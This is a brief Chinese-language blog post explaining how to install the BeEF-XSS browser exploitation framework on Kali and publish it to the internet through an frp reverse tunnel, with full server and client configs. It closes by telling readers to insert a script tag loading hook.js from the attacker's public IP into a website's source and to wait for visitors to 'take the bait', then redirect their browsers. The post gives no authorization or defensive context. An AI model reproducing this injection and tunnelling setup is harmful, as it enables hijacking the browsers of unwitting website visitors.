beef-xss

发布于 2021-12-26  1829 次阅读


此页面已安装beef-xss

beef-xss平台是一款针对xss漏洞利用的平台
apt update     kali安装beef-xss
apt -y install beef-xss
安装之后cmd输入beef-xss运行
访问http://127.0.0.1:3000/ui/panel即可账号beef   密码是安装好后自己设置的

beef-xss与frp联动内网穿透
服务器设置             开启3000端口
[common]
bind_port = 50050                      客户端与服务器建立隧道
vhost_http_port = 3000                    触发js访问服务器的3000端口,但是3000端口没有服务,信息发送到内网客户端3000上
客户端设置
[common]
server_addr = 公网ip
server_port = 50050
[beef-xss]
type = http
local_ip = 192.168.1.131                    客户端监听本地的3000端口
local_port = 3000
custom_domains = 服务器ip

至此frp内网穿透搭建完成

只要将<script src="http://公网ip:3000/hook.js"></script>插入网站源代码即可

一旦有人上钩

可以使用redirect模块第一个重定向浏览器(网页跳转进行测试)

frp更多具体操作:https://blog.csdn.net/Inke88/article/details/76677956

 

子夜不哭
最后更新于 2021-12-26